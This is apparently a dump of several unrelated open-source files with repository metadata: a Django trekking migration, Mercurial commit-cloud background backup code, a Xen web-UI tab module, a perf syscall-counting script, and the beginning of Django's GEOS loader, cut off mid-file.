'topo_object': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'aggregations'", 'db_column': "'evenement'", 'to': u"orm['core.Topology']"})
},
u'core.stake': {
'Meta': {'ordering': "['id']", 'object_name': 'Stake', 'db_table': "'l_b_enjeu'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stake': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_column': "'enjeu'"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"})
},
u'core.topology': {
'Meta': {'object_name': 'Topology', 'db_table': "'e_t_evenement'"},
'ascent': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'denivelee_positive'", 'blank': 'True'}),
'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_column': "'date_insert'", 'blank': 'True'}),
'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_column': "'date_update'", 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'supprime'"}),
'descent': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'denivelee_negative'", 'blank': 'True'}),
'geom': ('django.contrib.gis.db.models.fields.GeometryField', [], {'default': 'None', 'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False'}),
'geom_3d': ('django.contrib.gis.db.models.fields.GeometryField', [], {'default': 'None', 'dim': '3', 'spatial_index': 'False', 'null': 'True', 'srid': str(settings.SRID)}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kind': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'length': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'null': 'True', 'db_column': "'longueur'", 'blank': 'True'}),
'max_elevation': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'altitude_maximum'", 'blank': 'True'}),
'min_elevation': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'altitude_minimum'", 'blank': 'True'}),
'offset': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_column': "'decallage'"}),
'paths': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.Path']", 'through': u"orm['core.PathAggregation']", 'db_column': "'troncons'", 'symmetrical': 'False'}),
'slope': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'null': 'True', 'db_column': "'pente'", 'blank': 'True'})
},
u'core.usage': {
'Meta': {'ordering': "['usage']", 'object_name': 'Usage', 'db_table': "'l_b_usage'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"}),
'usage': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_column': "'usage'"})
},
u'tourism.informationdesk': {
'Meta': {'ordering': "['name']", 'object_name': 'InformationDesk', 'db_table': "'t_b_renseignement'"},
'description': ('django.db.models.fields.TextField', [], {'db_column': "'description'", 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '256', 'null': 'True', 'db_column': "'email'", 'blank': 'True'}),
'geom': ('django.contrib.gis.db.models.fields.PointField', [], {'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False', 'db_column': "'geom'", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'municipality': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'db_column': "'commune'", 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_column': "'nom'"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'telephone'", 'blank': 'True'}),
'photo': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'photo'", 'blank': 'True'}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True', 'db_column': "'code'", 'blank': 'True'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'db_column': "'rue'", 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'desks'", 'db_column': "'type'", 'to': u"orm['tourism.InformationDeskType']"}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '256', 'null': 'True', 'db_column': "'website'", 'blank': 'True'})
},
u'tourism.informationdesktype': {
'Meta': {'ordering': "['label']", 'object_name': 'InformationDeskType', 'db_table': "'t_b_type_renseignement'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'label'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.accessibility': {
'Meta': {'ordering': "['name']", 'object_name': 'Accessibility', 'db_table': "'o_b_accessibilite'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.difficultylevel': {
'Meta': {'ordering': "['id']", 'object_name': 'DifficultyLevel', 'db_table': "'o_b_difficulte'"},
'difficulty': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'difficulte'"}),
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.poi': {
'Meta': {'object_name': 'POI', 'db_table': "'o_t_poi'", '_ormbases': [u'core.Topology']},
'description': ('django.db.models.fields.TextField', [], {'db_column': "'description'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'publication_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'db_column': "'date_publication'", 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'public'"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"}),
'topo_object': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Topology']", 'unique': 'True', 'primary_key': 'True', 'db_column': "'evenement'"}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pois'", 'db_column': "'type'", 'to': u"orm['trekking.POIType']"})
},
u'trekking.poitype': {
'Meta': {'ordering': "['label']", 'object_name': 'POIType', 'db_table': "'o_b_poi'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.practice': {
'Meta': {'ordering': "['name']", 'object_name': 'Practice', 'db_table': "'o_b_pratique'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.route': {
'Meta': {'ordering': "['route']", 'object_name': 'Route', 'db_table': "'o_b_parcours'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"}),
'route': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'parcours'"})
},
u'trekking.trek': {
'Meta': {'ordering': "['name']", 'object_name': 'Trek', 'db_table': "'o_t_itineraire'", '_ormbases': [u'core.Topology']},
'access': ('django.db.models.fields.TextField', [], {'db_column': "'acces'", 'blank': 'True'}),
'accessibilities': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'treks'", 'to': u"orm['trekking.Accessibility']", 'db_table': "'o_r_itineraire_accessibilite'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'advice': ('django.db.models.fields.TextField', [], {'db_column': "'recommandation'", 'blank': 'True'}),
'advised_parking': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'parking'", 'blank': 'True'}),
'ambiance': ('django.db.models.fields.TextField', [], {'db_column': "'ambiance'", 'blank': 'True'}),
'arrival': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'arrivee'", 'blank': 'True'}),
'departure': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'depart'", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'db_column': "'description'", 'blank': 'True'}),
'description_teaser': ('django.db.models.fields.TextField', [], {'db_column': "'chapeau'", 'blank': 'True'}),
'difficulty': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'treks'", 'null': 'True', 'db_column': "'difficulte'", 'to': u"orm['trekking.DifficultyLevel']"}),
'disabled_infrastructure': ('django.db.models.fields.TextField', [], {'db_column': "'handicap'", 'blank': 'True'}),
'duration': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_column': "'duree'", 'blank': 'True'}),
'information_desks': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['tourism.InformationDesk']", 'null': 'True', 'db_table': "'o_r_itineraire_renseignement'", 'blank': 'True'}),
'is_park_centered': ('django.db.models.fields.BooleanField', [], {'db_column': "'coeur'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'networks': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'treks'", 'to': u"orm['trekking.TrekNetwork']", 'db_table': "'o_r_itineraire_reseau'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'parking_location': ('django.contrib.gis.db.models.fields.PointField', [], {'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False', 'db_column': "'geom_parking'", 'blank': 'True'}),
'points_reference': ('django.contrib.gis.db.models.fields.MultiPointField', [], {'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False', 'db_column': "'geom_points_reference'", 'blank': 'True'}),
'practice': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'treks'", 'null': 'True', 'db_column': "'pratique'", 'to': u"orm['trekking.Practice']"}),
'public_transport': ('django.db.models.fields.TextField', [], {'db_column': "'transport'", 'blank': 'True'}),
'publication_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'db_column': "'date_publication'", 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'public'"}),
'related_treks': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_treks+'", 'symmetrical': 'False', 'through': u"orm['trekking.TrekRelationship']", 'to': u"orm['trekking.Trek']"}),
'route': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'treks'", 'null': 'True', 'db_column': "'parcours'", 'to': u"orm['trekking.Route']"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"}),
'themes': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'treks'", 'to': u"orm['common.Theme']", 'db_table': "'o_r_itineraire_theme'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'topo_object': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Topology']", 'unique': 'True', 'primary_key': 'True', 'db_column': "'evenement'"}),
'web_links': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'treks'", 'to': u"orm['trekking.WebLink']", 'db_table': "'o_r_itineraire_web'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'})
},
u'trekking.treknetwork': {
'Meta': {'ordering': "['network']", 'object_name': 'TrekNetwork', 'db_table': "'o_b_reseau'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'reseau'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.trekrelationship': {
'Meta': {'unique_together': "(('trek_a', 'trek_b'),)", 'object_name': 'TrekRelationship', 'db_table': "'o_r_itineraire_itineraire'"},
'has_common_departure': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'depart_commun'"}),
'has_common_edge': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'troncons_communs'"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_circuit_step': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'etape_circuit'"}),
'trek_a': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'trek_relationship_a'", 'db_column': "'itineraire_a'", 'to': u"orm['trekking.Trek']"}),
'trek_b': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'trek_relationship_b'", 'db_column': "'itineraire_b'", 'to': u"orm['trekking.Trek']"})
},
u'trekking.weblink': {
'Meta': {'ordering': "['name']", 'object_name': 'WebLink', 'db_table': "'o_t_web'"},
'category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'links'", 'null': 'True', 'db_column': "'categorie'", 'to': u"orm['trekking.WebLinkCategory']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '128', 'db_column': "'url'"})
},
u'trekking.weblinkcategory': {
'Meta': {'ordering': "['label']", 'object_name': 'WebLinkCategory', 'db_table': "'o_b_web_category'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
}
}
complete_apps = ['trekking']
| bsd-2-clause |
facebookexperimental/eden | eden/hg-server/edenscm/hgext/commitcloud/background.py | 1 | 10766 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
"""background backup and sync
This module allows automatic backup or sync operations to be started after
every command that modifies the repo.
Automatic backups are enabled by setting the 'infinitepushbackup.autobackup'
config option to true.
Automatic backups can be temporarily disabled by setting
'infinitepushbackup.disableduntil' to a unix timestamp, or by running 'hg cloud
disable', which stores the disable time in the autobackup state file
('commitcloud/autobackup'). If both of these are set then backups are disabled
until both of them have expired.
The output from background backup or sync operations is logged to a directory
configured in the 'infinitepushbackup.logdir' config option.
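Example configuration (these are the option names this module reads; the
values and the log directory are illustrative only)::

    [infinitepushbackup]
    autobackup = true
    # unix timestamp until which automatic backup stays disabled (optional)
    disableduntil = 1700000000
    # directory for background backup/sync output logs (optional)
    logdir = /var/log/hg-autobackup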
"""
from __future__ import absolute_import
import errno
import json
import os
import stat
import time
import bindings
from edenscm.mercurial import (
dispatch,
encoding,
error,
extensions,
localrepo,
pycompat,
util,
)
from edenscm.mercurial.i18n import _
from . import util as ccutil, workspace
def extsetup(ui):
extensions.wrapfunction(dispatch, "runcommand", _runcommand)
extensions.wrapfunction(localrepo.localrepository, "transaction", _transaction)
# Autobackup state
#
# The autobackupstatefile contains a JSON object containing state for
# commitcloud automatic backups.
#
# Valid fields are:
#
# "disableduntil" - An integer unixtime that automatic backup is disabled until.
_autobackupstatefile = "commitcloud/autobackup"
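# An example state file, assuming only the documented "disableduntil" field is
# present (the value is an illustrative unix timestamp):
#   {"disableduntil": 1700000000}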
def loadautobackupstate(repo):
try:
with repo.sharedvfs.open(_autobackupstatefile) as f:
return json.load(f)
except IOError as e:
if e.errno != errno.ENOENT:
raise
except Exception:
repo.ui.warn(_("invalid commitcloud autobackup state - ignoring\n"))
return {}
def saveautobackupstate(repo, state):
repo.sharedvfs.makedirs("commitcloud")
with repo.sharedvfs.open(_autobackupstatefile, "w", atomictemp=True) as f:
f.write(pycompat.encodeutf8(json.dumps(state)))
def disableautobackup(repo, until):
state = loadautobackupstate(repo)
if until is not None:
state["disableduntil"] = until
else:
state.pop("disableduntil", None)
saveautobackupstate(repo, state)
def autobackupdisableduntil(repo):
"""returns the timestamp that backup disable expires at
Backup can be disabled by the user, either in config, or by running
'hg cloud disable', which stores its state in the autobackup state.
"""
# developer config: infinitepushbackup.disableduntil
disableduntilconf = repo.ui.configint("infinitepushbackup", "disableduntil", None)
disableduntilstate = util.parseint(loadautobackupstate(repo).get("disableduntil"))
if disableduntilconf is None:
return disableduntilstate
if disableduntilstate is None:
return disableduntilconf
return max(disableduntilconf, disableduntilstate)
def autobackupenabled(repo):
# Backup is possibly disabled by user, but the disabling might have expired.
# developer config: infinitepushbackup.disableduntil
timestamp = autobackupdisableduntil(repo)
if timestamp is not None and time.time() <= timestamp:
return False
return repo.ui.configbool("infinitepushbackup", "autobackup")
def _runcommand(orig, lui, repo, cmd, fullargs, *args):
"""start an automatic backup or cloud sync after every command
Since we don't want to start auto backup after read-only commands,
then this wrapper checks if this command opened at least one transaction.
If yes then background backup will be started.
"""
try:
return orig(lui, repo, cmd, fullargs, *args)
finally:
# For chg, do not wrap the "serve" runcommand call. Otherwise, if
# autobackup is enabled for the repo, and a transaction was opened
# to modify the repo, start an automatic background backup.
if (
"CHGINTERNALMARK" not in encoding.environ
and repo is not None
and autobackupenabled(repo)
and getattr(repo, "txnwasopened", False)
and not getattr(repo, "ignoreautobackup", False)
):
lui.debug("starting commit cloud autobackup in the background\n")
backgroundbackup(repo)
def _transaction(orig, self, *args, **kwargs):
"""record if a transaction was opened
If a transaction was opened then we want to start a background backup or
cloud sync. Record the fact that transaction was opened.
"""
self.txnwasopened = True
return orig(self, *args, **kwargs)
def backgroundbackupother(repo, dest=None):
"""start background backup for the other remote
Commit cloud can be configured to back up to a secondary backup server by
setting the 'infinitepush-other' remote to the path to the secondary server.
If this is set, and it differs from the main 'infinitepush' remote, start
background backup for the other remote.
"""
other = "infinitepush-other"
try:
remotepath = repo.ui.paths.getpath(other)
except error.RepoError:
remotepath = None
if remotepath and remotepath.loc != ccutil.getremotepath(repo, dest):
repo.ui.debug("starting background backup to %s\n" % remotepath.loc)
backgroundbackup(repo, ["hg", "cloud", "backup"], dest=other)
def backgroundbackup(repo, command=None, dest=None):
"""start background backup"""
ui = repo.ui
if command is not None:
background_cmd = command
elif workspace.currentworkspace(repo):
background_cmd = ["hg", "cloud", "sync"]
else:
background_cmd = ["hg", "cloud", "backup"]
infinitepush_bgssh = ui.config("infinitepush", "bgssh")
if infinitepush_bgssh:
background_cmd += ["--config", "ui.ssh=%s" % infinitepush_bgssh]
# developer config: infinitepushbackup.bgdebuglocks
if ui.configbool("infinitepushbackup", "bgdebuglocks"):
background_cmd += ["--config", "devel.debug-lockers=true"]
# developer config: infinitepushbackup.bgdebug
if ui.configbool("infinitepushbackup", "bgdebug", False):
background_cmd.append("--debug")
if dest:
background_cmd += ["--dest", dest]
logfile = None
logdir = ui.config("infinitepushbackup", "logdir")
if logdir:
# make newly created files and dirs non-writable
oldumask = os.umask(0o022)
try:
try:
# the user name from the machine
username = util.getuser()
except Exception:
username = "unknown"
if not _checkcommonlogdir(logdir):
raise WrongPermissionsException(logdir)
userlogdir = os.path.join(logdir, username)
util.makedirs(userlogdir)
if not _checkuserlogdir(userlogdir):
raise WrongPermissionsException(userlogdir)
reponame = os.path.basename(repo.sharedroot)
_removeoldlogfiles(userlogdir, reponame)
logfile = getlogfilename(logdir, username, reponame)
except (OSError, IOError) as e:
ui.debug("background backup log is disabled: %s\n" % e)
except WrongPermissionsException as e:
ui.debug(
(
"%s directory has incorrect permission, "
+ "background backup logging will be disabled\n"
)
% e.logdir
)
finally:
os.umask(oldumask)
if not logfile:
logfile = os.devnull
with open(logfile, "a") as f:
timestamp = util.datestr(util.makedate(), "%Y-%m-%d %H:%M:%S %z")
fullcmd = " ".join(util.shellquote(arg) for arg in background_cmd)
f.write("\n%s starting: %s\n" % (timestamp, fullcmd))
Stdio = bindings.process.Stdio
out = Stdio.open(logfile, append=True, create=True)
bindings.process.Command.new(background_cmd[0]).args(
background_cmd[1:]
).avoidinherithandles().newsession().stdin(Stdio.null()).stdout(out).stderr(
out
).spawn()
class WrongPermissionsException(Exception):
def __init__(self, logdir):
self.logdir = logdir
_timeformat = "%Y%m%d"
def getlogfilename(logdir, username, reponame):
"""Returns name of the log file for particular user and repo
Different users have different directories inside logdir. Log filename
consists of reponame (basename of repo path) and current day
(see _timeformat). That means that two different repos with the same name
can share the same log file. This is not a big problem so we ignore it.
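    For example, with a hypothetical logdir of "/var/log/hg-autobackup", user
    "alice" and repo "myrepo", a run on 2024-01-31 would log to
    "/var/log/hg-autobackup/alice/myrepo20240131" (reponame plus _timeformat date).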
"""
currentday = time.strftime(_timeformat)
return os.path.join(logdir, username, reponame + currentday)
def _removeoldlogfiles(userlogdir, reponame):
existinglogfiles = []
for entry in util.listdir(userlogdir):
filename = entry[0]
fullpath = os.path.join(userlogdir, filename)
if filename.startswith(reponame) and os.path.isfile(fullpath):
try:
time.strptime(filename[len(reponame) :], _timeformat)
except ValueError:
continue
existinglogfiles.append(filename)
    # _timeformat has the property that sorting log file names in descending
    # order puts the newest files first
existinglogfiles = sorted(existinglogfiles, reverse=True)
    # Keep only the 5 most recent log files for this repo (one per day, so
    # roughly the last 5 days)
maxlogfilenumber = 5
if len(existinglogfiles) > maxlogfilenumber:
for filename in existinglogfiles[maxlogfilenumber:]:
os.unlink(os.path.join(userlogdir, filename))
def _checkcommonlogdir(logdir):
"""Checks permissions of the log directory
We want log directory to actually be a directory, have restricting
deletion flag set (sticky bit)
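    For reference, such a directory would typically be created along the lines
    of "mkdir <logdir>; chmod 1777 <logdir>" (a shared directory with the
    sticky bit set); the actual path comes from the infinitepushbackup.logdir
    option, the commands are only an illustration.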
"""
try:
st = os.stat(logdir)
return stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
except OSError:
# is raised by os.stat()
return False
def _checkuserlogdir(userlogdir):
"""Checks permissions of the user log directory
We want user log directory to be writable only by the user who created it
and be owned by `username`
"""
try:
st = os.stat(userlogdir)
# Check that `userlogdir` is owned by `username`
if os.getuid() != st.st_uid:
return False
return (
st.st_mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH)
) == stat.S_IWUSR
except OSError:
# is raised by os.stat()
return False
| gpl-2.0 |
jpaton/xen-4.1-LJX1 | tools/python/xen/sv/GenTabbed.py | 46 | 4954 | import types
from xen.sv.HTMLBase import HTMLBase
from xen.sv.util import getVar
class GenTabbed( HTMLBase ):
def __init__( self, title, urlWriter, tabStrings, tabObjects ):
HTMLBase.__init__(self)
self.tabStrings = tabStrings
self.tabObjects = tabObjects
self.urlWriter = urlWriter
self.title = title
def write_BODY( self, request ):
if not self.__dict__.has_key( "tab" ):
try:
self.tab = int( getVar( 'tab', request, 0 ) )
except:
self.tab = 0
request.write( "\n<div class='title'>%s</div>" % self.title )
TabView( self.tab, self.tabStrings, self.urlWriter ).write_BODY( request )
try:
request.write( "\n<div class='tab'>" )
render_tab = self.tabObjects[ self.tab ]
render_tab( self.urlWriter ).write_BODY( request )
request.write( "\n</div>" )
except Exception, e:
request.write( "\n<p>Error Rendering Tab</p>" )
request.write( "\n<p>%s</p>" % str( e ) )
request.write( "\n<input type=\"hidden\" name=\"tab\" value=\"%d\">" % self.tab )
def perform( self, request ):
request.write( "Tab> perform" )
request.write( "<br/>op: " + str( getVar( 'op', request ) ) )
request.write( "<br/>args: " + str( getVar( 'args', request ) ) )
request.write( "<br/>tab: " + str( getVar( 'tab', request ) ) )
try:
action = getVar( 'op', request, 0 )
if action == "tab":
self.tab = int( getVar( 'args', request ) )
else:
                self.tab = int( getVar( 'tab', request, 0 ) )
self.tabObjects[ self.tab ]( self.urlWriter ).perform( request )
except:
pass
class PreTab( HTMLBase ):
def __init__( self, source ):
HTMLBase.__init__( self )
self.source = source
def write_BODY( self, request ):
request.write( "\n<pre>" )
request.write( self.source )
request.write( "\n</pre>" )
class GeneralTab( HTMLBase ):
def __init__( self, dict, titles ):
HTMLBase.__init__( self )
self.dict = dict
self.titles = titles
def write_BODY( self, request ):
request.write( "\n<table width='100%' cellspacing='0' cellpadding='0' border='0'>" )
def writeAttr( niceName, attr, formatter=None ):
if type( attr ) is types.TupleType:
( attr, formatter ) = attr
if attr in self.dict:
if formatter:
temp = formatter( self.dict[ attr ] )
else:
temp = str( self.dict[ attr ] )
request.write( "\n<tr><td width='50%%'><p>%s:</p></td><td width='50%%'><p>%s</p></td></tr>" % ( niceName, temp ) )
for niceName, attr in self.titles.items():
writeAttr( niceName, attr )
request.write( "</table>" )
class NullTab( HTMLBase ):
def __init__( self, title="Null Tab" ):
HTMLBase.__init__( self )
self.title = title
def write_BODY( self, request ):
request.write( "\n<p>%s</p>" % self.title )
class ActionTab( HTMLBase ):
def __init__( self, actions ):
self.actions = actions
HTMLBase.__init__( self )
def write_BODY( self, request ):
for item in self.actions.items():
try:
((op, attr), title) = item
except:
(op, title) = item
attr = ""
            request.write( "\n<div class='button' onclick=\"doOp2( '%s', '%s' )\">%s</div>" % (op, attr, title) )
class CompositeTab( HTMLBase ):
def __init__( self, tabs, urlWriter ):
HTMLBase.__init__( self )
self.tabs = tabs
self.urlWriter = urlWriter
def write_BODY( self, request ):
for tab in self.tabs:
tab( self.urlWriter ).write_BODY( request )
def perform( self, request ):
for tab in self.tabs:
tab( self.urlWriter ).perform( request )
class TabView( HTMLBase ):
# tab - int, id into tabs of selected tab
# tabs - list of strings, tab names
# urlWriter -
def __init__( self, tab, tabs, urlWriter ):
HTMLBase.__init__(self)
self.tab = tab
self.tabs = tabs
self.urlWriter = urlWriter
def write_BODY( self, request ):
for i in range( len( self.tabs ) ):
if self.tab == i:
at = " id='activeTab'"
else:
at = ""
request.write( "\n<div%s class='tabButton' onclick=\"doOp2( 'tab', '%d' )\">%s</div>" % ( at, i, self.tabs[ i ] ) )
| gpl-2.0 |
kangsterizer/linux-3.1.y-rsbac | tools/perf/scripts/python/syscall-counts.py | 11181 | 1522 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n";
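# For example, "perf script -s syscall-counts.py firefox" would restrict the
# summary to syscalls made by a (hypothetical) "firefox" command, given a
# suitable prior "perf record" of raw_syscalls:sys_enter events.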
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
isabernardes/Heriga | Herigaenv/lib/python2.7/site-packages/django/contrib/gis/geos/libgeos.py | 345 | 6218 | """
This module houses the ctypes initialization procedures, as well
as the notice and error handler function callbacks (get called
when an error occurs in GEOS).
This module also houses GEOS Pointer utilities, including
get_pointer_arr(), and GEOM_PTR.
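If the library cannot be located automatically, its path may be given
explicitly via the GEOS_LIBRARY_PATH setting read below (the path shown is
only an example)::

    GEOS_LIBRARY_PATH = '/usr/local/lib/libgeos_c.so'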
"""
import logging
import os
import re
from ctypes import CDLL, CFUNCTYPE, POINTER, Structure, c_char_p
from ctypes.util import find_library
from django.contrib.gis.geos.error import GEOSException
from django.core.exceptions import ImproperlyConfigured
from django.utils.functional import SimpleLazyObject
logger = logging.getLogger('django.contrib.gis')
def load_geos():
# Custom library path set?
try:
from django.conf import settings
lib_path = settings.GEOS_LIBRARY_PATH
except (AttributeError, EnvironmentError,
ImportError, ImproperlyConfigured):
lib_path = None
# Setting the appropriate names for the GEOS-C library.
if lib_path:
lib_names = None
elif os.name == 'nt':
# Windows NT libraries
lib_names = ['geos_c', 'libgeos_c-1']
elif os.name == 'posix':
# *NIX libraries
lib_names = ['geos_c', 'GEOS']
else:
raise ImportError('Unsupported OS "%s"' % os.name)
# Using the ctypes `find_library` utility to find the path to the GEOS
# shared library. This is better than manually specifying each library name
# and extension (e.g., libgeos_c.[so|so.1|dylib].).
if lib_names:
for lib_name in lib_names:
lib_path = find_library(lib_name)
if lib_path is not None:
break
# No GEOS library could be found.
if lib_path is None:
raise ImportError(
'Could not find the GEOS library (tried "%s"). '
'Try setting GEOS_LIBRARY_PATH in your settings.' %
'", "'.join(lib_names)
)
# Getting the GEOS C library. The C interface (CDLL) is used for
# both *NIX and Windows.
# See the GEOS C API source code for more details on the library function calls:
# http://geos.refractions.net/ro/doxygen_docs/html/geos__c_8h-source.html
_lgeos = CDLL(lib_path)
# Here we set up the prototypes for the initGEOS_r and finishGEOS_r
# routines. These functions aren't actually called until they are
